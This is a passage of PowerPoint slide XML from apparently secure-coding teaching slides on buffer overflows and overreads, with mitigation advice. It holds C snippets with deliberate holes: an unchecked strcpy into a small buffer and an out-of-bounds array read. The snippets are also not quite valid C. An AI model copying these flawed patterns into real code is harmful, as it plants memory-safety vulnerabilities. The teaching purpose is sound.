              <a:off x="2858033" y="2227623"/>
              <a:ext cx="304800" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>r</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E9FD4FA-6958-43B3-8957-FA1210F23638}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3163518" y="2227598"/>
              <a:ext cx="304800" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>n</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86F13A67-FDCA-4062-9688-3ADF78DB4AE8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3468318" y="2227598"/>
              <a:ext cx="304800" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>a</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5A0AF04-6B69-465C-BAFD-2BD339FCB640}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3773118" y="2227598"/>
              <a:ext cx="304800" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>m</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D22DBA95-DBC1-4800-BB66-4247ED8F910B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4077918" y="2227598"/>
              <a:ext cx="304800" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>e</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1E0E2A1-5863-464D-8B01-46938316C907}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4381499" y="2227623"/>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B</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="TextBox 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87FD7832-FBE4-49D7-8635-D8F0D4BD064C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4686299" y="2227623"/>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a</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="TextBox 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4540F737-D389-4A30-B656-3638208AB7AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4991099" y="2227623"/>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d</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="TextBox 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52C3533A-AF61-4C54-9DF4-7DCA5CE87C1F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5295899" y="2227623"/>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C</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="TextBox 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C689511-42C8-4280-BB33-54594032AC96}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5601384" y="2227598"/>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o</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89CCBC90-5A2B-4EF6-936E-4EC0BC8BECD7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5906184" y="2227598"/>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d</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C2EED23-7835-400B-AA52-64557909CB3C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6210984" y="2227598"/>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e</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="TextBox 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{430C509E-41A0-49E6-BA4D-2405A808CE4F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6515784" y="2227598"/>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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B3F86A8-0640-4D1E-972E-E616A276EC88}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6819365" y="2227598"/>
              <a:ext cx="304800"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a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03608DA9-BD7A-4B6F-BE67-F3F98A4CD0F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3996045" y="2383230"/>
            <a:ext cx="4973379" cy="1384995"/>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void main() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  char username[] = getUserName();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  char mybuffer[7];                // 8 byte buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  strcpy(mybuffer, username);      // Unsafe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  return 0;</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{118F2301-0026-4420-94A4-596CC988AD77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2629710" y="3822430"/>
            <a:ext cx="742511" cy="276999"/>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strcpy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="AutoShape 303">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B922FA5-DCD4-4989-A271-C6977B1B4868}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4674373" y="3147041"/>
            <a:ext cx="174626" cy="2376630"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 65909"/>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AutoShape 303">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E08E6E70-F669-4093-8A90-4DA2E184D8A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7255380" y="3000347"/>
            <a:ext cx="174626" cy="2670018"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 65909"/>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Rounded Rectangle 135">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B8C7C47-2CA8-49B8-9EFB-0141DB4D4A83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3692290" y="4452725"/>
            <a:ext cx="215293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8 byte buffer (mybuffer)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rounded Rectangle 135">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{113DAC45-0C31-46FF-9514-B3B3E27498DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6601786" y="4452725"/>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Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="285893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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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61519" y="1371600"/>
            <a:ext cx="8460150" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Environments that intermingle data with code may provide direct access to memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This scenario can be abused.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software allows user input to write beyond the bounds of the data buffer into executable code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker crafts input to inject code into privileged process space to jump to malicious code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enables a wide range of other attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires significant skill to uncover and exploit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provides a very powerful platform for an attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problem is most likely to appear in low-level languages like C, C++, or assembly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forms of the problem may appear in higher-level languages, like Java and C#.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even “safer” languages may interact with other code that has a buffer overflow defect.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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Buffer Overflows (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121677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6694A-0370-4D2A-904B-CAF8565AE46F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture Placeholder 5" descr="A picture containing object, clock&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D837422-D4E6-4131-BD0B-EB913B410924}"/>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4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25278173-6114-4523-A30A-E3BA946F2622}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Follow Best Practices for Secure Coding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3674736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20</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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validate user input for type and length to ensure it will not overflow the legitimate data boundaries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the least privileges possible for the accounts in which your processes run.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Be especially careful when passing input parameters to other code, especially unmanaged code, DLLs, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(If you use third-party libraries), use only libraries that you have researched very carefully to ensure they are free from buffer overflow vulnerabilities.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Buffer Overflow Defects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C96D85A-B157-4C40-9490-0005BB694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Buffer Overreads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4F2FCFB-F6EE-4231-B512-8F2A75234E19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Conceptually similar to overflow.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>writing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to memory outside of a data buffer's boundaries, this vulnerability involves </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>reading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> memory outside of the buffer's boundaries.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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB111029-53B3-4015-9E2D-E180BCDBB591}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3969652"/>
            <a:ext cx="5720447" cy="2123658"/>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int getValueFromArray(int *array, int arrayLen, int index) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  int value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  if (index &lt; arrayLen) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    value = array[index];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  } else </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    printf("Value is: %d\n", array[index]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    value = -1;</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return value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Freeform: Shape 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4254E5E-1E11-45FD-AF47-F38E8AAB4C9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3044413" y="4460786"/>
            <a:ext cx="2476712" cy="239999"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3940404"/>
              <a:gd name="connsiteY0" fmla="*/ 395926 h 427857"/>
              <a:gd name="connsiteX1" fmla="*/ 2309567 w 3940404"/>
              <a:gd name="connsiteY1" fmla="*/ 405352 h 427857"/>
              <a:gd name="connsiteX2" fmla="*/ 3271101 w 3940404"/>
              <a:gd name="connsiteY2" fmla="*/ 141402 h 427857"/>
              <a:gd name="connsiteX3" fmla="*/ 3940404 w 3940404"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 427857"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3940404"/>
              <a:gd name="connsiteY0" fmla="*/ 395926 h 407230"/>
              <a:gd name="connsiteX1" fmla="*/ 1677972 w 3940404"/>
              <a:gd name="connsiteY1" fmla="*/ 358218 h 407230"/>
              <a:gd name="connsiteX2" fmla="*/ 3271101 w 3940404"/>
              <a:gd name="connsiteY2" fmla="*/ 141402 h 407230"/>
              <a:gd name="connsiteX3" fmla="*/ 3940404 w 3940404"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 407230"/>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3940404"/>
              <a:gd name="connsiteY0" fmla="*/ 395926 h 395926"/>
              <a:gd name="connsiteX1" fmla="*/ 1677972 w 3940404"/>
              <a:gd name="connsiteY1" fmla="*/ 358218 h 395926"/>
              <a:gd name="connsiteX2" fmla="*/ 3271101 w 3940404"/>
              <a:gd name="connsiteY2" fmla="*/ 141402 h 395926"/>
              <a:gd name="connsiteX3" fmla="*/ 3940404 w 3940404"/>
